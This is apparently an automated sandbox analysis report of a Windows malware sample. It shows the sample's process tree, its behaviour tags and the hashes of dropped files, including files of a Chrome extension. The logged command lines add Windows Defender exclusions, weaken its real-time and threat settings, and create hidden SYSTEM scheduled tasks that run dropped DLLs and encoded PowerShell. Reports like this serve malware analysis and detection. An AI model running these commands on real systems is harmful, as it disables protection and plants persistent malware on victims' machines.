C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2800 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2628 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:808 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:704 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1492 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1944 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1796 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:3036 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2400 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:324⤵PID:1708
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:644⤵PID:1108
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:324⤵PID:536
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:644⤵PID:2016
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:324⤵PID:1816
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:644⤵PID:1948
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:324⤵PID:1936
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:644⤵PID:2264
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:324⤵PID:1268
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:644⤵PID:1544
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:324⤵PID:3028
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:644⤵PID:2216
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:1660
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:2828
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:324⤵PID:1820
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:644⤵PID:2592
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:324⤵PID:2028
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:644⤵PID:2564
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ggMxgUjGp" /SC once /ST 00:27:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1832 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ggMxgUjGp"3⤵PID:2388
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ggMxgUjGp"3⤵PID:2636
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:2240
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1068
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:2616
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:2612
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZTNkTKukmvvbOMPkn" /SC once /ST 00:23:56 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\IOqIorP.exe\" 0c /vBWPdidUO 385120 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2188 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ZTNkTKukmvvbOMPkn"3⤵PID:2764
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2104 -s 2403⤵
- Loads dropped DLL
- Program crash
PID:2292 -
C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\IOqIorP.exeC:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\IOqIorP.exe 0c /vBWPdidUO 385120 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1600 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:2808
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:2112
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:696
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:1960
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:912
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:2952
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:2304
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:1776
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2548
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:292
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:1320
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:2804
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2628
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:1772
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:576
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:556 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:1852
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "btZaCbGShXZoJDfvCg"3⤵PID:796
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:1352
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵PID:712
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:408
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1636 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1108 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵PID:1940
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:3020
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1556 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1540 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\hsUwQAlMU\LaAZwT.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ucrVpivlTlXwlAC" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1972 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ucrVpivlTlXwlAC2" /F /xml "C:\Program Files (x86)\hsUwQAlMU\hJTohrj.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2320 -
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ucrVpivlTlXwlAC"3⤵PID:2324
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ucrVpivlTlXwlAC"3⤵PID:2204
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gXuMbmSriUtfuo" /F /xml "C:\Program Files (x86)\dlfHiRefefjU2\MrbggDq.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1588 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZEKxHChbZmoqN2" /F /xml "C:\ProgramData\nivjmgppGaMJQQVB\prQdquS.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:3032 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GJlNcuNKEmfKGuMTK2" /F /xml "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\vFloWYX.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:808 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jVeWQSRcqyudsTDYlcg2" /F /xml "C:\Program Files (x86)\QtKEgKYoTGTqC\zKIdGvm.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2816 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BjyVbWVaXyfCTlHuI" /SC once /ST 00:06:34 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QqEAMUespgTHJnVz\GGHPVGXy\QsmiPNz.dll\",#1 /FatdidvA 385120" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1572 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "BjyVbWVaXyfCTlHuI"3⤵PID:2404
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZTNkTKukmvvbOMPkn"3⤵PID:3044
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 15243⤵
- Loads dropped DLL
- Program crash
PID:2668 -
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\GGHPVGXy\QsmiPNz.dll",#1 /FatdidvA 3851202⤵PID:2420
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\GGHPVGXy\QsmiPNz.dll",#1 /FatdidvA 3851203⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2016 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BjyVbWVaXyfCTlHuI"4⤵PID:2596
-
C:\Windows\system32\taskeng.exetaskeng.exe {D562C738-E88D-4855-85F4-86F13C3FCB40} S-1-5-21-2297530677-1229052932-2803917579-1000:HKULBIBU\Admin:Interactive:[1]1⤵PID:1668
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:296 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1800
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1752 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1296
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1060 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1400
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1140
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1312
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2976
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD560374ded0c3bcaf757264550a8dc899a
SHA18611e859d5b871f5166a1403fe7ba1571b05ef68
SHA2567f9e83652029fd8b60f388ba6608e906bdaa8a893190567278c4c0d297cb4156
SHA5124eed6f0bea7cb9196ac5a8afcbe3cfff196e9720c52e4cf9c7a7c368a8ee57d7737b8123e05cafb80be73026395743f63924c0ab7bf2db78f48dc5b81ac34c7e
-
Filesize
2KB
MD5388e3efd8d9f8ed17912b945fc3dfaed
SHA11a9d265e2ffd75db1672289989d45eafe1bd914e
SHA256c44513df90c9ac0192c9632bd2fbe066b1e561e707e21fc336b6b12a600d6d97
SHA512d3044cb64ce6c7fa0fe2b1c40254e6038eeb0e0d69e11bc9e8975d3f38bd907fec4807c52adc36de7b949409275ad3f06429f8de88b15f785cd69d73152ebb57
-
Filesize
2KB
MD57133cbfbc466f3cba660ecded4d14fab
SHA1dcc4ec90aee7327755b6bd73ea8e93a03b278663
SHA25651d5f16b5c615cc1724c89a09bd4738ff1e40b81919cecb67ac3cc6852885ba2
SHA512516dba2b83ea2bc679b635f73d836d8cd3814051a365b217abc567890fbbcda1330b7f48d477bcce810f7a5e8eb6ed69b0b08e514b67b94a4862be5e0a1fce78
-
Filesize
2KB
MD55b2353ae21efad463ed2b670b25d495d
SHA10d06dca75d16435d6649a0b727e9fee19c54c439
SHA256828e57714080116baf8475e036e1a30c8f982567b4a8a56bbccc0dd33c4ef20b
SHA5120c8261ab946c26e1cb9e9ddc6d4ea3030615cc6f9e41f013a72769f451ac1d7e08a855ab473e10d99ff9bbd64e6b61ebac18f0d37ee547f8c40008ea45c63855
-
Filesize
2.0MB
MD5aba320adc551da717e47ce892b020da8
SHA18eca8ab1f6f6cf77aa1f172f040c3cc6d18c3d56
SHA256685a78eb1da4048ef237b54d27fbfdca856e2a2f10c8ebea9f2ea333d0ee49f3
SHA512615c66dcdbe010bc9eee556311b68e05989814c045c203c8a310911a99510ebc2659c27c39119a89d161963ec3d196b9918579aead72b83f2347bed540f7cd48
-
Filesize
2KB
MD50f2783090b0b353283d2b9057f337666
SHA10cb004b706dac27acb076680a8a581230489d0cd
SHA25607f90e8a00083e3d13296f15ab51fe0e56eb48c2bfa4cecb6977bdb766df64ef
SHA5123281662c4556d9c5f1cc9feb66b235e6c4f7a04f82feb0c06b5027865861e9117de7ad159aa5984960cd8b9d1352ff635c44e3fb7c840e51b8baf82a27c2f200
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD54be91abc007dfae3c035be23055993e3
SHA1cabb8f8b46bac60855b90d064241b80ff22edebf
SHA256907b0d54a8b9907e2ec0e0c7ee9aeaea03a327bc9932d3145bd257c28a77fbeb
SHA512f52a1fd4b87e5ea87958f469b37dcc91076e2b38c8dc35c3dab1c27d29aaa0dd1243d2dcf9522e0fb3a15487cfa9f586fe47abcb8ccef0769290f20e0f3acf94
-
Filesize
27KB
MD542443e7403e8573c30c07839872096dd
SHA12004de9473a8f26ac56c2bcbc788ff78951a0bd2
SHA25627cc4136d51e147079a15952598b9364bb27b43ce6ce7a0427dfe7a0d3019264
SHA512745bf79a76afd8a289aa692f382d1ef213847fc50bcab7c348d51517ae8c6e98c777568f35c285bb2543d447dbfa2b551f35df70f689ca18a891d6c64e63725c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5c1068039cc2f5eb734faeded082ec439
SHA12f2cad412d977964545191356436358ecad066c8
SHA2563ddb34a4213500bb76db222e869ac086d6e9350604bd2d8ec79b9f5c31f842d6
SHA5127494f1814cf273d2b2a8ae616e5ca400b944b063741679a8077bf07c41e8f2322271250dd77dad4f2be4dcfa73b861c897316149628aaaed30a13640081a2f06
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD513955283515fa8e1544fdca8af656115
SHA151e0a127ed39c5bfa0442c78ea523f441decc7ba
